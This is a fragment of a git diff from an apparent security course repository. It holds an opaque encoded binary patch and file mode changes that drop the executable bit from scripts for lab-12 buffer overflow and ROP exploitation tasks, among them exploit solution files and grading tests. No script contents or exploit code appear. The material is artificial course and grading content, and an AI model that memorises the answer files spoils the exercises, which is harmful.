ze#}}qP}1;^ZNqDY>jl_U{SKR_o`uxKomok$DuF6blbXH{TBWSyhd`?Hdc0G=>buaD zY*H%UgWCBVH%FlqY7OM2-&U$Qp3f;}OET+1lLKr~g;m*eqR$;W8QTS~Fx@mm|>l=1|2@)L(y z!>G3gqVl*{;%=8U5>|*mLk+nvrVEWBW-ZB=3paJM&qAoUOL)@r37Yaf8Q;o^wbISb zl9>=zS>4!L@+qX#wCAMmPBd3v(k|&l$xE8PH78fedgtKC{RcjmCs1(ks z74uvx-8Z^>>Xzdo?PwHk_swo+72>3d9$a=^)xtf`MN0K5s~ceNUa8*bzP6#K?xqF> z;*vJ$L@}K>aJ4R-L5bTGVEBsCQ%B3PdGP2%E9I!7t(aF(#l1i_R#AtVH(|1=TqgM{ z({~A6&8zCETirli^)zLERh`>8clO+AN^MCE=8PJv+Zuv`{-TN6I>lM#cALFm<8_xi zg(Fz{wR*U^ft|kU%F&r)o58tfrdL?wMwmEmw%T5QKe|#sSxKsF1>0+26Fqfp()ld6 zLLK(|quEj+<5G=W(?O7_{ zLS?76Qk`KsnNIYP>KIa$Q>#^nR)-#!ZC91s9U4MqWgY2yDiYBRncVm1`go%De~HY^gUWE4;CvB@Q~@n|v}@^GTnb!?Zmv7R2u zC4;(NU`YcwhzLCrM}}1Da_iw_2*N}lnw2uPB1OSmMh~VExk08=F>?yNM$(lu3Z_Eg z;E+-HhCojxLbeHVwWLRBI~d693Ntecxm;){6At5K=U^t2wZh2n;sAGN;zn3T!^-NC z!=ExpriBHD!e%6Nyua9G^}bc;gXq@fOfhDF$yBk+zU9E+fz_-%(B0GPx0A_`9LBz8 z#bjJ%QdykQ5oTv(pxM`WD6EG9MnLF82H&07W6!1r!$=v+FvHK&*|N;K+wwFGE@{Qa z$R)$8qTysX6Ayw7WP-6(@uka`dYYo1rbsf?)YsE#5(s*5S5rEZGQvS4m4Psj-J1-? zGO1)Lmu<==cgK^VCfRltO4B@;2xMb+rFaSfXTQvY0=<@pn>>bOdL82^L!zexp&Nvr zOET9EfrRM*TF<4;Fh>KKfj~5TdG96SS!UO9hcXs&ze%^g7>4f)g%b&1S2(-NNTq#9 z%M0xeWWr6^RK$=3Vi?Xu0>Q8^5g5pF)6~-HGXmLNSzjieZW`R%#6uN3q6wY%WpNN1 z9E;aSaZ_q2(&`Ngukhuv8JUY24F-LCmM_(pwwXDZP0?h|*RsSHPX-e?91_ydVtfN} zWDkBx;xqQ9F$WdOdB}#s5pPUL9WZulE@!tyT~iZ1}!TH7-KVQ3cn0|4f>Cp6;bP`6yFBlIA+%O zV70b!iv14o_8m+u#v7fY-wmE$0ki!Y)PDdx*O%mL9aZ9yDfYb4wcDfppMmEMC;KxE z{9jJ7f3bk~z~%(_g;smh95cmR;0yC%KPa&0_&)>B&sa_W^;kkdXcg+GgYTW}f4yj+ z9`T_Y#^+B#FlW4#JjUNb{bAc*wOBsIUk`YGlxnxP9X#7dEyM@@f$iH<`r{qFeRE3w z9`JTNIlgazm-*sAwGJFb!Hm)3#WbV`2I9Jb>#L6INFZ(I=R%n^aIWJt4`I59;&Kzt z=*FNP#I%RgRM$f(J(@@j1QL1(7ssp~$n6oq)L=RhHo_q&dr_r;!(19St}rdU_Sh4wY^Zxn$40;I-_(T(SMR!gQ^&@hPB_E$ zU-z%mP3^j_Eka-0d&`=RUj3Ht?pys^^{pLidi}aJ^|adw$n5!)Y~@KEl9P2E*Euie z*K|-fV!7ll@4y}_oq5u(SxipAGHtp*p@+>mi-EB2ISRFMMl%zh&ASE8pH~=Mkr9m` zXH$9%DcA{24wwn#ByT2co0-@Jb)~L=w^FtXB<5TcN?@AecL}%`z@%oxgL*p7xhJj1 zc3b)01(o0y6Mca|*9Wp$YYYWnFzEW$jh*&h;?BitDZ6(N^Cz&8F>%bM$iS zFA4HDD8OK0GFhl&xdu=Qpq>1!2Phgr+lALA7A}!(JI<+Z!p=j5RcyO1@V~)xIr`%> z!E>;?9<*9uN83#R&U3Wmv%-21XFzkIgDUd5BA*%F2EYPY+VR=qMcB!C6fzdtvg`ox zxgh=Vncx9b;^Nkrs* z>B|_?PX4wD>?SN3ko3j<_CA39qaA-I;`|@*_fdfz@0~8dt{F1B*!|-p8QUN4SsGzf zVH*L{j)nJNY@h9Nu5X@V=YgE%B7pwvwrIDQ3ad~j0UKhw+yOg}%>dgvK8v$ys_%o{ zeRih`?D+Jx(C#;FIG+jxHpz!>HcfvI;{vh1Kwy(gEjxQ0Z!Qyp8EAH)9id~2-49k^ zKT=^8+m5)Px_AkXg*^!7Jji)mb4WD+o|BBRUEaAF=W0Pk+coc^3+?Xcz>{2C37t*; E7pjy_O8@`> diff --git a/labs/lab-12/tasks/rip-my-buffers-off/support/exploit.sh b/labs/lab-12/tasks/rip-my-buffers-off/support/exploit.sh old mode 100755 new mode 100644 diff --git a/labs/lab-12/tasks/rip-my-buffers-off/tests/graded_test.inc.sh b/labs/lab-12/tasks/rip-my-buffers-off/tests/graded_test.inc.sh old mode 100755 new mode 100644 diff --git a/labs/lab-12/tasks/rip-my-buffers-off/tests/run_all_tests.sh b/labs/lab-12/tasks/rip-my-buffers-off/tests/run_all_tests.sh old mode 100755 new mode 100644 diff --git a/labs/lab-12/tasks/rip-my-buffers-off/tests/tests.sh b/labs/lab-12/tasks/rip-my-buffers-off/tests/tests.sh old mode 100755 new mode 100644 diff --git a/labs/lab-12/tasks/rop/solution/exploit.sh b/labs/lab-12/tasks/rop/solution/exploit.sh old mode 100755 new mode 100644 diff --git a/labs/lab-12/tasks/rop/support/exploit.sh b/labs/lab-12/tasks/rop/support/exploit.sh old mode 100755 new mode 100644 diff --git a/labs/lab-12/tasks/rop/tests/graded_test.inc.sh b/labs/lab-12/tasks/rop/tests/graded_test.inc.sh old mode 100755 new mode 100644 diff --git a/labs/lab-12/tasks/rop/tests/run_all_tests.sh b/labs/lab-12/tasks/rop/tests/run_all_tests.sh old mode 100755 new mode 100644 diff --git a/labs/lab-12/tasks/rop/tests/tests.sh b/labs/lab-12/tasks/rop/tests/tests.sh old mode 100755 new mode 100644